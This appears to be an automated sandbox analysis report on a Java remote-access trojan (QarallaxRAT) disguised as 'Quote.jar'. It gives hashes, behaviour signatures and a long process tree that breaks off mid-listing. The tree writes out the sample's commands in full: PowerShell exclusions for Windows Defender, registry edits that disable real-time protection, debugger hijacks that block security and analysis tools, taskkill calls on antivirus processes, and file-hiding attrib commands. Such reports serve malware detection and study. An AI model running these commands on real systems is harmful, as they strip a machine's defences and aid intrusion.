Analysis

  • max time kernel
    141s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    18-08-2020 19:48

General

  • Target

    Quote.jar

  • Size

    399KB

  • MD5

    2b68744fed1c4c5c156a4247160fa8f8

  • SHA1

    50cb830acadbe050d1cdd3cc1e8516e76a9ab30b

  • SHA256

    e06e4d0ce2a189209e34ee24832d021418781872dae863ffa2b4126b14e17b15

  • SHA512

    4ed06e23b899d465efc0b75a42b283a48c07eb8ae0dd1848df7a700032324a6a8d7368bb2bad5b7ccc4041b7fd2df447bc60278d65a717989f82d8fff771fe49

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • QarallaxRAT

    Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).

  • Qarallax RAT support DLL 1 IoCs
  • Sets file execution options in registry 2 TTPs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Kills process with taskkill 16 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 164 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 386 IoCs
  • Views/modifies file attributes 1 TTPs 8 IoCs

Processes

  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\Quote.jar
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3672
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe
      2⤵
        PID:560
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:524
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:808
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:412
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1172
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h C:\Users\Admin\Oracle
        2⤵
        • Views/modifies file attributes
        PID:1416
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h +r +s C:\Users\Admin\.ntusernt.ini
        2⤵
        • Views/modifies file attributes
        PID:1580
      • C:\Windows\SYSTEM32\attrib.exe
        attrib -s -r C:\Users\Admin\UaoPj\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1936
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +s +r C:\Users\Admin\UaoPj\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2052
      • C:\Windows\SYSTEM32\attrib.exe
        attrib -s -r C:\Users\Admin\UaoPj
        2⤵
        • Views/modifies file attributes
        PID:2080
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +s +r C:\Users\Admin\UaoPj
        2⤵
        • Views/modifies file attributes
        PID:2140
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h C:\Users\Admin\UaoPj
        2⤵
        • Views/modifies file attributes
        PID:2716
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h +s +r C:\Users\Admin\UaoPj\SbBYi.class
        2⤵
        • Views/modifies file attributes
        PID:2824
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2992
        • C:\Windows\system32\reg.exe
          reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
          3⤵
            PID:3876
          • C:\Windows\system32\reg.exe
            reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
            3⤵
              PID:3700
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\UaoPj','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\UaoPj\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3892
          • C:\Windows\System32\reg.exe
            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
            2⤵
              PID:3764
            • C:\Windows\System32\taskkill.exe
              "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
              2⤵
              • Kills process with taskkill
              PID:1736
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
              2⤵
                PID:3344
              • C:\Windows\System32\reg.exe
                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                2⤵
                  PID:4064
                • C:\Windows\System32\reg.exe
                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                  2⤵
                    PID:1628
                  • C:\Windows\System32\reg.exe
                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                    2⤵
                      PID:912
                    • C:\Windows\System32\reg.exe
                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                      2⤵
                        PID:864
                      • C:\Windows\System32\reg.exe
                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                        2⤵
                          PID:1700
                        • C:\Windows\System32\reg.exe
                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                          2⤵
                            PID:1824
                          • C:\Windows\System32\reg.exe
                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                            2⤵
                              PID:2100
                            • C:\Windows\System32\reg.exe
                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                              2⤵
                                PID:2820
                              • C:\Windows\System32\reg.exe
                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                2⤵
                                  PID:3360
                                • C:\Windows\System32\reg.exe
                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                  2⤵
                                    PID:1448
                                  • C:\Windows\System32\reg.exe
                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                    2⤵
                                      PID:2192
                                    • C:\Windows\System32\reg.exe
                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                      2⤵
                                        PID:1228
                                      • C:\Windows\System32\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                        2⤵
                                          PID:2980
                                        • C:\Windows\System32\taskkill.exe
                                          "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
                                          2⤵
                                          • Kills process with taskkill
                                          PID:1856
                                        • C:\Windows\System32\reg.exe
                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                          2⤵
                                            PID:1548
                                          • C:\Windows\System32\reg.exe
                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                            2⤵
                                              PID:2148
                                            • C:\Windows\System32\reg.exe
                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                              2⤵
                                                PID:3740
                                              • C:\Windows\System32\reg.exe
                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                2⤵
                                                  PID:3932
                                                • C:\Windows\System32\reg.exe
                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                  2⤵
                                                    PID:1812
                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                    cmd.exe
                                                    2⤵
                                                      PID:4064
                                                      • C:\Windows\system32\reg.exe
                                                        reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
                                                        3⤵
                                                          PID:2196
                                                        • C:\Windows\system32\reg.exe
                                                          reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
                                                          3⤵
                                                            PID:788
                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                          cmd.exe
                                                          2⤵
                                                            PID:2988
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
                                                              3⤵
                                                                PID:2980
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe
                                                              2⤵
                                                                PID:1576
                                                                • C:\Windows\system32\reg.exe
                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
                                                                  3⤵
                                                                    PID:2192
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
                                                                    3⤵
                                                                      PID:2884
                                                                  • C:\Windows\System32\taskkill.exe
                                                                    "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
                                                                    2⤵
                                                                    • Kills process with taskkill
                                                                    PID:2088
                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                    cmd.exe
                                                                    2⤵
                                                                      PID:2708
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
                                                                        3⤵
                                                                          PID:3160
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
                                                                          3⤵
                                                                            PID:416
                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                          cmd.exe
                                                                          2⤵
                                                                            PID:864
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
                                                                              3⤵
                                                                                PID:3020
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
                                                                                3⤵
                                                                                  PID:912
                                                                              • C:\Windows\System32\taskkill.exe
                                                                                "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
                                                                                2⤵
                                                                                • Kills process with taskkill
                                                                                PID:860
                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                cmd.exe
                                                                                2⤵
                                                                                  PID:3396
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
                                                                                    3⤵
                                                                                      PID:2148
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
                                                                                      3⤵
                                                                                        PID:3528
                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                      cmd.exe
                                                                                      2⤵
                                                                                        PID:3468
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
                                                                                          3⤵
                                                                                            PID:1804
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
                                                                                            3⤵
                                                                                              PID:1224
                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                            cmd.exe
                                                                                            2⤵
                                                                                              PID:3388
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
                                                                                                3⤵
                                                                                                  PID:3024
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
                                                                                                  3⤵
                                                                                                    PID:860
                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                  cmd.exe
                                                                                                  2⤵
                                                                                                    PID:980
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
                                                                                                      3⤵
                                                                                                        PID:3808
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
                                                                                                        3⤵
                                                                                                          PID:1224
                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                        cmd.exe
                                                                                                        2⤵
                                                                                                          PID:1452
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
                                                                                                            3⤵
                                                                                                              PID:1804
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
                                                                                                              3⤵
                                                                                                                PID:3808
                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                              cmd.exe
                                                                                                              2⤵
                                                                                                                PID:1864
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:3536
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:3876
                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                    cmd.exe
                                                                                                                    2⤵
                                                                                                                      PID:2808
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:3436
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:1548
                                                                                                                        • C:\Windows\System32\taskkill.exe
                                                                                                                          "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
                                                                                                                          2⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          PID:3856
                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                          cmd.exe
                                                                                                                          2⤵
                                                                                                                            PID:2980
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:3772
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:2132
                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                cmd.exe
                                                                                                                                2⤵
                                                                                                                                  PID:3360
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:3852
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:1028
                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                      cmd.exe
                                                                                                                                      2⤵
                                                                                                                                        PID:1804
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:3420
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:3304
                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
                                                                                                                                            2⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:2256
                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                            cmd.exe
                                                                                                                                            2⤵
                                                                                                                                              PID:3808
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:1708
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4116
                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                  cmd.exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4136
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4172
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4192
                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                        cmd.exe
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4212
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4248
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4268
                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                              cmd.exe
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4288
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4324
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4344
                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                    cmd.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4364
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4400
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4420
                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                          cmd.exe
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4444
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4480
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4500
                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                cmd.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4520
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4556
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4576
                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4596
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:4636
                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4656
                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4676
                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4752
                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4780
                                                                                                                                                                                                • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                  PID:4688
                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4808
                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4844
                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4864
                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4884
                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4920
                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:4940
                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4960
                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:4996
                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5016
                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:5036
                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
